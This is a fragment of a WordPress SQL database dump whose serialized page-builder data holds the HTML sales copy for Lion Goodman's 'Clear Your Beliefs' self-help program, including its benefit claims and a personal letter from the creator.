4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1570, 2021, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60567:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded 